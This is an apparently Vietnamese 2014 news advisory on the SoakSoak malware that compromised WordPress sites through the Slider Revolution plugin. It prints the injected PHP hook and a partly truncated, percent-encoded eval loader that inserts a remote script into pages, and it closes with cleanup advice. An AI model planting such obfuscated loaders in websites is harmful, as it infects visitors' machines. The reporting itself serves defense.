Mã độc SoakSoak tấn công hơn 100.000 trang Wordpress

17:03 | 19/12/2014

Ngày 14/12/2014, thông tin về một chiến dịch chống lại WordPress được lan truyền trong khắp cộng đồng mạng khi phát hiện hơn 11.000 tên miền website sử dụng nền tảng WordPress nằm trong danh sách đen của cỗ máy tìm kiếm Google.

Trong nỗ lực cố gắng kiểm soát sự lây nhiễm mã độc, Google cũng đưa ra danh sách hơn 11.000 tên miền được cho là đã bị nhiễm. Tuy nhiên, đây có thể chỉ là một phần nhỏ các trang bị lây nhiễm và chưa thể đánh giá chính xác con số thực tế. Vì hiện nay có hơn 70 triệu website đang sử dụng nền tảng Wordpress, từ các blog cá nhân cho đến các hãng tin lớn như Time.com.

Theo hãng bảo mật Sucuri việc lây nhiễm mã độc được thực hiện thông qua một lỗ hổng bảo mật từ plugin của bên thứ 3 phát triển dưới tên gọi Slider Revolution - một plugin hỗ trợ việc trình chiếu ảnh miễn phí. Khi một trang web sử dụng nền tảng WordPress bị nhiễm mã độc, các tin tặc có thể nắm quyền điều khiển biến trang web đó thành công cụ tấn công các trang web khác hoặc lây nhiễm mã độc cho người dùng.

Mã độc SoakSoak thay đổi nội dung tệp tin wp-includes/template-loader.php trở thành wp-includes/js/swobject.js 

 <?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");                                                                                                                                                             
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Khi truy cập 1 website của bị nhiễm SoakSoak, người dùng sẽ bị chuyển hướng truy cập đến trang web SoakSoak.ru. Tại đây, website sẽ tự động tải tệp tin độc hại vào máy người dùng mà không cần sự cho phép.

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%
27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%
61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%
0A%29%3B"));

Hãng bảo mật Sucuri đã cung cấp một trang quét trực tuyến miễn phí http://sitecheck.sucuri.net/ giúp kiểm tra các trang web có bị lây nhiễm mã độc SoakSoak hay không.

Nếu trang web đã bị nhiễm mã độc, người quản trị cần gỡ bỏ các đoạn mã độc hại và khôi phục lại các tệp tin an toàn. Tuy nhiên, nếu hệ thống website có sử dụng hệ thống Firewall Website, CloudProxy thì website đó được bảo vệ khỏi mã độc SoakSoak.